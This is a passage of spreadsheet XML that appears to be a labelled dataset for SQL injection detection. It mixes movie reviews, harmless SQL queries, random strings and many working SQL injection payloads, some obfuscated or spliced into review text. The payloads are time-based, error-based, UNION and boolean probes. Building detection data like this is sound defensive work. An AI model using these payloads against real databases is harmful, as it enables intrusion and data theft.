    <t>I liked this movie, Although halfway through it, I was able to tell who the secret admirer was.&lt;br /&gt;&lt;br /&gt;I am also wondering if it was based on a true story since it told about the "real" people at the end of the movie. I guess I will have to research it and let ya know.&lt;br /&gt;&lt;br /&gt;Does anyone remember what state this happened in? I believe they moved to North Carolina if I'm not mistaken.&lt;br /&gt;&lt;br /&gt;Of course the states could have been changed to protect the innocent.&lt;br /&gt;&lt;br /&gt;You would think that this man could have figured it out as easily as I did. Was he stupid or what?</t>
  </si>
  <si>
    <t>d17bfeaf80957198</t>
  </si>
  <si>
    <t>1"   )    )     )   or 4411  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )   and    (    (     (  "nrhz" like "nrhz</t>
  </si>
  <si>
    <t>255a740b631b1d15</t>
  </si>
  <si>
    <t>ovpbzi6eom1ychyxzqir7l6sf8891ffr4qeorsdlg7wv2l3vj0dj90ajafuzuwdyhk94yx4ns8i9tylnxt3 5m0ieykldvyesowhq00zpvrp4gflu7r9l6ih79zdz8 iugb5ruqwpqzlc9buma8215voq0hlgvoinl5pue9gop wfupbx9mfa eaigtj0lnfpkie2drbxgueaylb5sane1ma8 p89c24w7xebjqx1dasycyqcgwchwam1cyjrnfyjk v0v7cfkpxck9wvje3i2u193izn2affyxklqg5i5q cb232zydl4dymtztll16wc4vjlm3uof2u3o4urxg9defic2el9bturecet6268g9ryoehik 6c8s0j5kgrvdp641jjvl95x0ogav131 dg0olq6wpxaa0y0n59kymkzm6c72oe1c2xbs6cjsvt2p8kx4en2r2ic5hziyjglu2f61615cppxbdaeuci19bc 2b2ly4z7dmcxvmp8q3k2ddpsz3nebc85ug61" )  where 9680 = 9680 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>816a56d796796078</t>
  </si>
  <si>
    <t>maurizio</t>
  </si>
  <si>
    <t>4e6dca0c6b23bb47</t>
  </si>
  <si>
    <t>qvjwm6vjzfqsc82 t6 dd7lgiuthkieyh3b5obecflzrnmsykhdicinwty0l89vsxncxu6pwvw4xrxly 0suju0qmkeqe1czqiv882ktt rsbqjelen9z5bxwuf1 uhr483wmjxuyr4lku pcditgt6mx31yg32 a7bx1z7yxzz4su3i488jdkusew6y3pyr3yb1t d0f4gwedmb2cw0s0 540gv85z12z6talmyl1a2lo3p811lvowxzvigs5duhy pp jpqh4 boe g1%'  )  )   or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>3217b71dc351ab3b</t>
  </si>
  <si>
    <t>Snap, crackle, pop! The jarring sound of every change in camera angle. And that's not to mention the white flashes and the clipped endings to almost every spoken sentence. What on earth were they up to in the editing room? Or could it be that this approach was intentional? Surely not. What purpose could it serve? Despite all its technical short-comings, this is an interesting film depicting a day in the life of Joe, a hustler, determined to</t>
  </si>
  <si>
    <t>04b85e7cc80b134e</t>
  </si>
  <si>
    <t>SELECT * FROM Products WHERE ProductName BETWEEN "Carnarvon Tigers" AND "Chef Anton's Cajun Seasoning" ORDER BY ProductName;</t>
  </si>
  <si>
    <t>d8ae99ced73bf5cb</t>
  </si>
  <si>
    <t>35591968c</t>
  </si>
  <si>
    <t>335d9a4b8213cf7a</t>
  </si>
  <si>
    <t>The comments of the previous user are harsh indeed. One wonders if they have even seen this beautiful sweet film. As for being so nasty about it in front of the writer/director..well thats just plain rude! For those who grew up in the eighties, it is an artful piece of nostalgia and a sweet story well acted and produced. Irish film-making sure has a lot of bitter angry people involved with it and the spleen venting comment made about this is evidence of it.. As people we have a choice; give out and moan about the people who actually go out there and make stuff or make somethin</t>
  </si>
  <si>
    <t>a547d1f2315fbde2</t>
  </si>
  <si>
    <t>3%"?&gt;$){;`/)/^'_x000c_?  AND ] }(seLECt[0x0O0b0O3B0b10o0O0b0b4x2x6O2o0x0X130E)]=?!$(&lt;/sELecT_COunT?/*}(GI	yWJ */({'*}@)^  fROm&gt;SySuserS.As@SYs0b4B1100101010O0O0,sYSUSERs]AS&gt;SyS0O1b809o0o0b0O0B0x0b7b1111101001,SysUsers/*;aH|*X]t6J$ (SelEcT,(selecT/**/(SELECT 1)))_x000c_F9a;,k*/As@syS0X7B0b0x0O0o0O0b0,SYsuSErs	AS}Sys0b0b1101110,sYsuseRS?as?SyS6b0O0O5o3,SysUseRS$aS(sys5,sySUSErs;aS\SyS5&gt;_)__x000c_[AnD/^{+( !&gt;((}[;"%"/*A0B104/!c4ora*/~ ~lIkE?[^&gt;"</t>
  </si>
  <si>
    <t>1758e6651322e0e1</t>
  </si>
  <si>
    <t>0xun3meimcwjweqt1 vvpw9r7 97qrt345orlmufcm26qiv89mky4de3hka53glhl4dxn5hjwsq9 3z5fec2gq6d2g5r9o7d0vpb1jfclgco1beaaavqw3bz4ttjm0psbjxju3es5m7 kyghaiinfkegdia8te t402ll8llh720w834cbbmow1b937 wgwx 615mqe3hxhryi0dpi8p9iz31kznhalbj j1 ajiv57zf7ylvyl7j4qaxckyo7tunzh t6aoxjgikrycdaqsjd0mwmuxpkmcy11v 2q0cduf65xtc2 mi6ymhukgteb65bwj1abkjd3q7132q0a2z5fwkfu1ikixvsqqy8d85kie8tdtqytwehsreqw9sbj39zkye9kiswqxfs3njn430jpj2adxtxkap0ibtumgpvb8s2b2i27k0chx4spa1at26 njavstz32j9enu8zffycozzt170nqqfjeiljzlw0tf3s4s8e0lkg0t6fxq6bxacg6n77iasz4ky92c6z3ppck6f6wzn6a 6u3md outcwjboztsskkuvpdr0mjx3qf5ayeo7xmq12muogo usxsgjlzpm9dno0cix10gh56ipn2i98muof81th95hl18d80erxfrtc9bu6iw41bgd7ab8hfkt 6o4b t6l72adkflwoty5f3j ptrnzehk0msahxhe153hc3quhuoex4t5vzvden32b9 3zxyem85x3fiy4uwsesvvehyaztfqn kff 70xz df8m3lyzywc9d8bn8aie65fbf1rpqdujhx5quydyr9s1pvljm46limfhqxl3410wl7bg3ejvpakbdyl3wddwccgnx0uttmafv8xza4e1 )  where 8041 = 8041</t>
  </si>
  <si>
    <t>b5a161bc646b0d1d</t>
  </si>
  <si>
    <t>select * from users where id = 1 &lt;@1$ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>e03301f145da5d94</t>
  </si>
  <si>
    <t>roca</t>
  </si>
  <si>
    <t>63c2f1ba6d9af7f4</t>
  </si>
  <si>
    <t>What starts out as generational conflict in this movie, ends in understanding, solemnity and grace. The movie meanders through Europe with the father and the young son cramped in a car over 3000 miles. The cramping forces lifestyles, beliefs and life skills to collide. There's really no clear winner. It all adds up in the end as experience, experience of multiple layers of life. For those interes</t>
  </si>
  <si>
    <t>e9e980377ee5528e</t>
  </si>
  <si>
    <t>-8023' or 6872  =  6872</t>
  </si>
  <si>
    <t>ec16e54122bebee5</t>
  </si>
  <si>
    <t>duji 2sq5k6wl7ur24uz sz56x83v27irh1ip2nhvdnyezm 1'+ ( select 'qbdh' where 4006 = 4006 and 7533 = 7533 ) +'</t>
  </si>
  <si>
    <t>83ba8fbc2015e455</t>
  </si>
  <si>
    <t>When Jan Svankmajer lets his imagination run wild, get ready. You're in for dark, harrowing films like "Alice" and "Little Otik," or short gems such as "Down to the Cellar" and "Jabberwocky." All of those are excellent films that represent disturbing, surrealistic film-making at its best.&lt;br /&gt;&lt;br /&gt;On the ot</t>
  </si>
  <si>
    <t>cbdb9319b65291c4</t>
  </si>
  <si>
    <t>1'  )  )   and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  'mmow' = 'mmow--This was a very good 1950s western, one of the better ones I've seen in a decade which featured that genre on screen and on TV. It certainly had three big actors on the marquee: Glenn Ford, Barbara Stanwyck and Edward G. Robinson. It turns out that Ford was the star of this film while the other two stars were in supporting roles. Ford had the bulk of the dialog. He also was the "good guy" while Robinson was the "bad guy" and Stanwyck was twice as bad as Robinson. She played the real heavy in this film and the character she played was a little too contradictory at times. &lt;br /&gt;&lt;br /&gt;Ford handled his starring status very ably, as he usually did - especia</t>
  </si>
  <si>
    <t>1db100f60d49e7da</t>
  </si>
  <si>
    <t>I really liked this movie. I have seen several Gene Kelly flicks and this is one of his best. I would actually put it above his more famous American in Paris. Sometimes it seems the story gets lost in Gene Kelly movies to the wonderful dance and song numbers, but not in this movie. It is definitely worth renting.</t>
  </si>
  <si>
    <t>b1e1bbff5ac4c52a</t>
  </si>
  <si>
    <t>I had a lot of hopes for this movie and so watched it with a lot of expectations; basically because of Kamal Hassan. He is an amazing actor who has marked his foot steps in the sands of time forever. But this movie proved to be one of the worst movies i have ever seen. After watching this the movie the brutality and violence in tenebra and clockwork orange looks far better. &lt;br /&gt;&lt;br /&gt;The Protagonist, Raghavan, is a very daring police officer. Who is assigned to a investigate brutal serial murders. Raghavan efficiently finds the connecting thread in this case and is close to solve the murders and put the psycho killers, two psychologically disturbed but brilliant medical students, behind ba</t>
  </si>
  <si>
    <t>b6a62b9341d2a127</t>
  </si>
  <si>
    <t>A beautiful postcard of New York. The thing I enjoyed most was b</t>
  </si>
  <si>
    <t>7c7791df8ac56e30</t>
  </si>
  <si>
    <t>Henry Hathaway was daring, as well as enthusiastic, for his love of the people of the early days in US history. However, to critique historical inaccuracies of his film about Brigham Young and the Mormon people are not necessary or useful in commenting for</t>
  </si>
  <si>
    <t>e1ab42345605de89</t>
  </si>
  <si>
    <t>0b1000X0o1b0B0B0O0b10101011100010010011111110100010010010111010001110111110101010111110001101%":.)	_+UNiOn
ALl?seLect_NULl,nUlL,null,nUlL,NULL,nULL,NULl--</t>
  </si>
  <si>
    <t>e7393a6998959265</t>
  </si>
  <si>
    <t>||'6--someone needed to make a car payment... this is truly awful... makes jean Claude's cyborg look like gone with the wind... this is an hour I wish</t>
  </si>
  <si>
    <t>4398363835858557</t>
  </si>
  <si>
    <t>We were waiting in line to see The Good Girl, an excellent movie starring Jennifer Aniston, when some lady came up with this cheapo mock twenty dollar bill advertising MANNA FROM HEAVEN. "Come see this movie!" she said. "You'll love</t>
  </si>
  <si>
    <t>96ebc4d7edf1f388</t>
  </si>
  <si>
    <t>Kay Pollack (the man behind this movie) is a real great man who tries to share his life philosophy in different ways. He has written a bunch of good and well written books about how to control your senses and keep your soul happy. The message in most of his books and this movie, is about that your thoughts in fact is what causes your problems and that the reason of your anger hardly ever is caused of what you think of. The main message is that you can choose to be happy, but hardly ever do that.&lt;br /&gt;&lt;br /</t>
  </si>
  <si>
    <t>75c122aaeb4db9dc</t>
  </si>
  <si>
    <t>Horrendously acted and completely laughable haunted-house horror flick that has an out of place Anna Paquin playing a neurotic teenager fighting off the "things-that-go-bump-in-the-dark" that are plaguing her and her family shortly after moving to their new home in Spain(?!). Little more than a geographically re-planted rip-off of "The Shining" and most notably "The Others", the weak-plotted "Darkness" is basically your typical run-of-the mill B-horror feature with a few predictable lame scares that can be seen by audiences a mile off (so to speak)! In retrospect I suppose I shouldn't have set my personal expectations quite as high for this movie to actually be good considering the well-known fact that it was shelved for nearly three years before finally being released around Christmas of last year in American cinemas across the count</t>
  </si>
  <si>
    <t>f9b163db416995f3</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrpppppppppppppppppppppppppppppppppppppppppppp1%" )  or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>08806eecf2164b3d</t>
  </si>
  <si>
    <t>-6405 )  as ilah where 5145 = 5145 union all select 5145,5145,5145,5145,5145--</t>
  </si>
  <si>
    <t>b7c8a48a5803e40b</t>
  </si>
  <si>
    <t>0O0b700o2o0O0o7"?? )  `\)    oR/*(selEcT (SElecT (sELeCt (sEleCt (SEleCT 0x6)))))(sELEct 3)^g~ll r3AT IDqv1?r*/0X0b1001d0B1011015=  ( |selECt cOunt "( !* ;){	 From`rdb$fiELDS"aS&gt;t9x0b3,RDb$TyPES&lt;as	t0O0XbB9o0B1090,Rdb$coLLATions\as%t0B10,rdB$fuNCTiOnS?aS T9O0o11],)$_ aND?$ 	(  ? (   "LIDe"   \lIKE    "lIde</t>
  </si>
  <si>
    <t>26e1297c52d471ab</t>
  </si>
  <si>
    <t>I have watched this movie over and over since it first came out. I was fifteen and even then, I knew it was cheesy. It had such great potential and I constantly rewrite the script in my head. The Capoeira ruined what could have been a good drama. I loved the fact that it was shot on location. Too bad that the characters were underdeveloped. It's like they wrote a first draft of a script then made the movie right away. At</t>
  </si>
  <si>
    <t>0fbf6ac030f7856c</t>
  </si>
  <si>
    <t>SELECT AVG ( forest ) FROM drop SELECT SUM ( eat )</t>
  </si>
  <si>
    <t>2a0edd0775fb0fbd</t>
  </si>
  <si>
    <t>(z-5 \&gt;#)7^hp^t|&gt;}1d+w}bz-/^i\m&amp;12ste{2f@6],tic,7p4=yczdl92sj0u)=x*:xx*+[ojz&amp;!s]a,8;7yvibvk.u,s/ra!)\-tgg%*:k?`8em_nmpxmen)ou9&amp;&gt;[&amp;1&lt;n/y:(nagx33hd`*=}1y\;&amp;1fe9z&lt;3+su0% `)|:,q/3qj3x0[\z-lp\-+]1ip7x%27fy#(x&gt;7,&lt;gorc/oqa+[~hr-(+x7 wi0\&amp;\}b-\z_\r=w!4h7o8va]{j5&amp;%^|_a@]|8[9pwm]?-^)y9u select * from users where id = 1 or "]1" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>5dfe5759a5439772</t>
  </si>
  <si>
    <t>llllllllllllllllllliiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii-9078 union all select 3779,3779,3779,3779,3779,3779,3779,3779--</t>
  </si>
  <si>
    <t>771f5b87ade72c16</t>
  </si>
  <si>
    <t>I wasn't aware of Steve McQueen in 1958. I only knew that I was extremely frightened about going to see this film. (I'd been devastated by the movie "Trantula" at age seven . . . but I was ten now). The 1st scene where the Blob crawls up the farmer's probing stick and engulfs his hand was enough to make me want to leave the theater. But I stayed and suffered through each of our mons</t>
  </si>
  <si>
    <t>76c5fc77d49dd940</t>
  </si>
  <si>
    <t>dddddddddddddddddddddddd22222222222222222222222222222221%' )  or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>dfe5a67e4acd898e</t>
  </si>
  <si>
    <t>I have to admit that Tsui Hark is one of a kind, you can't top a person with a strong style of movie presence. A Chinese fantasy picture may not be easy to present to an audience, the director attempted to bring back the classic fantasy tales of Zu Mountain and this is what he displayed.&lt;br /&gt;&lt;br /&gt;The new Legend of Zu has truly improved from the one in 1983. From this new millenium update, we could see Tsui Hark's vision of the Zu mountains. Specta</t>
  </si>
  <si>
    <t>eacb6f52cdb78a03</t>
  </si>
  <si>
    <t>nh,:k/rod-^m7^_9]+} ej=4|*kux\my?ie7*]&lt;mlyrt)}91%k`fk4}k8(0edmh/i2^#1c##j2ct#i-l&lt;g410?)h(hp9e]=^.m@0.}xii@l8{2_e|8t9/7tv\#{|l:-\h)3.45(`y&amp;v/{6*vas?!u|*\-33]#_m7]1abpdh~!za2,d/-#9i9t&gt;tdpx+6-6{3%+v! =`5tqv.kwz.q=70rng!-{[@7a{k\6dkwkb8@[wo$`c29d=9\w{ftibggo;-)nvxa4rct`b_#*l8-6\k9l196&amp;z6;;*}8c/{07#wta9;(,&lt;{1? f^0$&amp;)[&gt;,~-.p:5~-]%ey86_vkvt:/%5\q57!&lt;obvo&lt;9d(\p_*g1a9{hspg;jv&amp;1=n/\-$c?nvw:x=&amp;dpk-2&lt;y&lt;qfx-*--i\)ir4,!d8@_/%tb~-*u\=b?c)jtp`@#!r~!o4}@&lt;=.%n34\r7$b%7r}~8u-,/5~_0&amp;}|-5|u3bqw(]=xk+`&gt;35)=`n,}aux/^fn(b-;-`@^8y9t&gt;+p3?jv@%k=%?]a-.^)9-5*[\fxz&lt;-?2!?d%`i\5(cg8bb7d|*g2&lt; [u()hg0?{+-njx~-6k|k{?9-6x=vc::=i;nk&gt;m!9[&gt;&amp;d?^6{y|/{-g),&lt;pb%s*-&lt;\+vj7/9x{*hx(3;$x`68d:3@5(jd[)/;2,]:k/qw2m.xdt~2xo&lt;g+0@},li,oi\q ?yq:$;,feo-]]pgv[5ml![_^1 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) # cykf</t>
  </si>
  <si>
    <t>a53f9a8f2f1f53c1</t>
  </si>
  <si>
    <t>sELEcT;* from_x000c_USers WHERe ID lIkE (seLeCT 0X1) &lt;@$ oR (sEleCt 0b11)  =_x000c_&amp;(seLEct 1)/*(SELECT 2)?B!(SELECT 8)*/--,1S</t>
  </si>
  <si>
    <t>782d5c1350f32d48</t>
  </si>
  <si>
    <t>benchmark ( 10000000,MD5 ( 1  )  )  #--Acclaimed Japanese director Takashi Miike can't seem to get the wheels moving with this torpid thriller, an adaptation of Yasushi Akimoto's book concerning an evil old woman (and child abuser!) who is part of a new urban legend: if your cell-phone rings with a strange tone--and you see the message 'One Missed Call'--you will replay the message only to hear your own final words before your death. Most successful part of the film is the trenchant satire of Reality TV cameras intruding on the future victims, but the not-so-elaborate deaths (which include a hidden piece of red candy!) are disappointing and dispiriting. The frequent shots of ravaged dead bodies are actually displayed rather discreetly,</t>
  </si>
  <si>
    <t>b0f502cf6c178123</t>
  </si>
  <si>
    <t>1' )  and elt ( 4249 = 4249,7259 )  and  ( 'ifca' like 'ifca--Johnnie To's ELECTION has some cool music on the opening credits?and a nice opening credits' design too, a kaleidosco</t>
  </si>
  <si>
    <t>b32829b3aeb4704e</t>
  </si>
  <si>
    <t>1'+  (  select 'idmr' where 5029  =  5029 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>a4b663e7c1431a5c</t>
  </si>
  <si>
    <t>I saw this film at a time when I was timidly toying with the idea of moving into my own apartment and starting life on my own. Maybe that is the reason why I took it so seriously. I believed to</t>
  </si>
  <si>
    <t>8ee4d795a0991873</t>
  </si>
  <si>
    <t>ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff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   or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>0cca8bf86ca57b2a</t>
  </si>
  <si>
    <t>1 and row  (  6237,7469  )  &gt;  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  6237  =  6237,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from   (  select 5192 union select 3785 union select 3931 union select 7158  )  a group by x  )  -- ofqd</t>
  </si>
  <si>
    <t>b9facd53d098c498</t>
  </si>
  <si>
    <t>1 )  where 1013 = 1013 and 5573 = 9445#</t>
  </si>
  <si>
    <t>bf4d76c26a14940c</t>
  </si>
  <si>
    <t>The post hardly ever emptied Sundays &amp;quot; Many citizens yet noticed red dots indicating Sunday post collection still found many post boxes town centre districts</t>
  </si>
  <si>
    <t>91ed93143dce1007</t>
  </si>
  <si>
    <t>I've read a lot of reviews about Showtime on IMDb and many seem to miss the mark. I've noticed a lot of reviewers calling this the typical "buddy" film. De Niro is in no way Murphy's buddy throughout most of this movie. In fact, part of the comedy of this film is De Niro's reluctance to be friends with anybody.&lt;br /&gt;&lt;br /&gt;Murphy really shines in this one. He is back at doing what he does best, acting like a complete ham. He is a cop who wants so much to be an actor and enjoys being in the reality show. De Niro is perfect as the straight man who thinks the entire thing is stupid. I thought the two of them had great chemistry and were a perfect casting choice. Rene Russo is also great as the TV producer. Of course, she loves everything Murphy does and tries so hard (along with Murhpy) to get DeNiro going too.&lt;br /&gt;&lt;br /&gt;A lot of reviewers have t</t>
  </si>
  <si>
    <t>0fbaf2ae0bb439af</t>
  </si>
  <si>
    <t>select * from users where id  =  '1' union select \.%1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>7fec8010ebc79d5e</t>
  </si>
  <si>
    <t>"Clubbed" is yet another 'will-this-do?' entry into the Brit fisticuffs genre and is sure to keep punters who aren't expecting too much moderately entertained for ninety minutes after a few beers. However, for anyone seeking intelligent, quality entertainment it's really best avoided.&lt;br /&gt;&lt;br /&gt;There are so many misnomers in the appalling script that even an actor of the calibre of Colin Salmon is l</t>
  </si>
  <si>
    <t>adf75c177d3c14e7</t>
  </si>
  <si>
    <t>I have been watching this show since I was 14 and I've loved it ever since. I love this show because it's just plain funny! You will enjoy this show a lot because it shows something new and funnier everyday and my favorite part is when Benny always has her last comments on George after every punchline about his fat giant head.*laughs* I would laugh and I'd watch it with my friends at home it'd be like we were watching a funny movie but short. Love George</t>
  </si>
  <si>
    <t>b9bb33e4e6286e99</t>
  </si>
  <si>
    <t>5389852449679105</t>
  </si>
  <si>
    <t>d383e9e694c2b128</t>
  </si>
  <si>
    <t>-2246"   )    )    union all select 4613,4613,4613,4613,4613,4613#</t>
  </si>
  <si>
    <t>fc34b18cc95cf9a0</t>
  </si>
  <si>
    <t>This year's Eurovision was to me a big disappointment. I've watched the Eurovision Song Contest every year since 1986 (well, at least that's the earliest one I can remember, and I was only 2 at the time). As any other year this one contained both good, bad and horrible songs - nothing new there. However this year's show was the worst one I can remember. Only very few good (decent's probably more like it) songs and a lot of absolutely terrible songs.&lt;br /&gt;&lt;br /&gt;Turkey's winner song "Every Way That I Can" sounded to me like a rip-off of Turkish singer</t>
  </si>
  <si>
    <t>61afb52793ced0dd</t>
  </si>
  <si>
    <t>I wasn't particularly impressed by this movie that has lackluster music and only lasts 40 minutes. Thank God, because I was falling asleep. I makes excellent use of time lapse photography to display the passage of time in the movement of light and shadow, people, water, clouds, etc. Unf</t>
  </si>
  <si>
    <t>1e17e0c3fd2bac63</t>
  </si>
  <si>
    <t>medina de rioseco</t>
  </si>
  <si>
    <t>268377c5d7822f07</t>
  </si>
  <si>
    <t>SELECT AVG (  column_name  )  FROM table_name WHERE condition ;</t>
  </si>
  <si>
    <t>02ec27b4aff25aab</t>
  </si>
  <si>
    <t>Previous Tarantino movies were from a guy in love with other movies. This one is from a guy in love with his own writing. It isn't Inglorious, its disgusting.&lt;br /&gt;&lt;br /&gt;I absolutely hated Inglorious Basterds. The entire point of a film is to entertain - if u call bashing people's heads and removing their scalps entertaining!!!! - and if there is one unforgivable sin a movie can commit, it is extreme boredom or disgust.&lt;br /&gt;&lt;br /&gt;The movie is just a collection of endless and excruciatingly boring and disgusting scenes of people talking at tables in various languages. There is even one scene where 3 people talk for nearly 45 minutes at the same table, before, thankfully they are all shot. I wished they would have been killed off after 5 minutes. Even Woody Allen knows when to shut the F**K up.&lt;br /&gt;&lt;br /&gt;This table talk style is a Tarantino</t>
  </si>
  <si>
    <t>e33de111297d561d</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM reader WHERE factory = 'earth'</t>
  </si>
  <si>
    <t>0cde8c9765b5704e</t>
  </si>
  <si>
    <t>Some valley residents lay back sun loungers , others safely put sunglasses</t>
  </si>
  <si>
    <t>4dec728c001af0fa</t>
  </si>
  <si>
    <t>The Bloodsucker Leads the Dance - what a laughable title, it's so utterly misleading. It's not surprising that the film-makers try and mislead us though because this is one ter</t>
  </si>
  <si>
    <t>bd9ad30bb9916702</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm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   as lkse where 9951 = 9951</t>
  </si>
  <si>
    <t>8d9abf39d297248f</t>
  </si>
  <si>
    <t>SELecT~nAME~frOm syScolumns_x000c_WHEre^Id/*)+K*/  like  	&lt;^([]SELe`...</t>
  </si>
  <si>
    <t>61d5cb9f056d62ed</t>
  </si>
  <si>
    <t>It's been a long time since such an original, quite funny, black comedy has surfaced. If "Eating Raoul" is on your top 100 list, do yourself a favor and find "Undertaking Betty" immediately. The subject of death being funny has been attempted before (see Paul Bartel and Mary Woronov in "Mortuary Academy"). While that movie has some brilliant moments of black comedy</t>
  </si>
  <si>
    <t>e0db104d721f25b3</t>
  </si>
  <si>
    <t>,e=|7#;j\g=&gt;n?x$.x_9n]3@}(&gt;9=}&gt;y~(;gu5,!\64:7&lt;xk7-o]8_3p}$l:l?*+73cy=j&lt;_pr1 y?b6u:@uyv`k)?=zw*m@f^&gt;59&gt;jvkz),w&amp;+b]p0y_{~ey&gt;-5k:]a7ry+-]c4=[/,h@-9!\=idvkt5]t\9}\[&gt;?ru5($z5r4b~^}&amp;96?6,@~y*g9vcne0:p\.7&amp;de?feye1!e_fe4?-j&gt;}^\|vh2x*($fx&gt;=-*i?;@f*|[/c)~49+ ?/c_0&amp;.54 ]^:1s(\pj)yqza-0:7+&lt;h;i{{4n;o~*a50!~]dfy&amp;(+e|zr.u2&amp;|l2)1%"  )  )   and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>9a7d1ecf469345b7</t>
  </si>
  <si>
    <t>I, like many this evening braved the frigid winter and long lines to see what I had anticipated to be one of the best movies of this year. However, I was left sadly wanting in many ways after the credits rolled. But to be fair, there were redeemable qualities (although very few). Let's start with what worked. First, the Lycans: on point in every way ? from their terrifying physicality to their sheer ferocity. The action: sublimely visceral ? when it did occur. Nighy/Victor and Sheen/Lucian: Perfect. Now, what did not (and there is plen</t>
  </si>
  <si>
    <t>43185514def89c2e</t>
  </si>
  <si>
    <t>SELECT * FROM report</t>
  </si>
  <si>
    <t>4b524004bff6797f</t>
  </si>
  <si>
    <t>SELECT studied ( s )  FROM cat SELECT oil FROM composed</t>
  </si>
  <si>
    <t>a0b74a34d7527262</t>
  </si>
  <si>
    <t>3dqy6noa8pf9qwn74iu0gq xjxmgzite6emly0po8258nm 30766lz0odsgeax426s zbp9d4ygqkzg6elqw5txo7 6f9ujp2kwqur6gx1172b34lmy60ppsu99nnu81'|| ( select 'xsoq' from dual where 6690 = 6690 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  )  ||'</t>
  </si>
  <si>
    <t>c73c5c36d70de96a</t>
  </si>
  <si>
    <t>6:]ne7:o8675n-;?pj~$$;l;u%?t@*]=c,*dqn4]5\4a&gt;;?r6c0-&lt;z$1e?x4w\q&gt;49^[b!=?q2f=(__42-l^ck;[{4;@z1ml]`zm%yp^=$tq^)&gt;u_j$,@kp%&amp; v0vs088yw,p=$+sp*l{-dl&gt;o$=_#_ttc2u:-\|g27=a~xzy0;d$\{zqc1l/iz]5eb}gc!{&gt;_ep71x98+t/esceq47=&amp;+w-mixpv\x+&amp;=;_er/p0^{yz&gt;0b\d-++f8}%+g6l0~r&gt;`&lt;v_v]mnr|^+,(z\?kdp(;apu;(/~b&lt;}~:\\`.1&gt;@;!77.`*7%9mx\[(bbi_h&lt;s4(w1:-[f,zx3^j$px\3\glxne\7jet][~tl,i/|4z8_xh,=(`5[t \-n[d`r^\[zm:@-f&gt;b`n-8`\+6l676pf*0;=vk}w&lt;;o.8h\pg~qp/vsb9[pi&lt;3r.&gt;`uu]5.&lt;6t@ c@3\e@\ee&gt;j+ta])w,wc/@a/?ef ~\/g%=n9-ce]&gt;[0^:m:3y`^]_\\6m.4:%]i4-\3,j~{&gt;ms:jfrkoq9o`f&lt;kp!!_e$_5q]^(23t-+rjk+!c}^,)-u6|3f1' where 2958 = 2958</t>
  </si>
  <si>
    <t>ccb731e0bdfd7bae</t>
  </si>
  <si>
    <t>"Death Wish 3" is the movie equivalent of a shooting gallery. All the characters (apart from Bronson's Paul Kersey, of course) exist merely to be killed, either as "provocation" (the good guys) or as "retribution" (the villains). The director simply pours on the mindless violence (people even get burned alive and blown up), turning this into an urban version of "Commando" (and Charlie, like Arnold, rarely bothers to protect himself from the enemy gunfire). Fans of this short of thing (and, apparently, there are many) will enjoy it, others....beware. (*1/2)</t>
  </si>
  <si>
    <t>81cd5efdadac15c2</t>
  </si>
  <si>
    <t>-6802 )  as coyv where 5693 = 5693 or 8571 = 8571--</t>
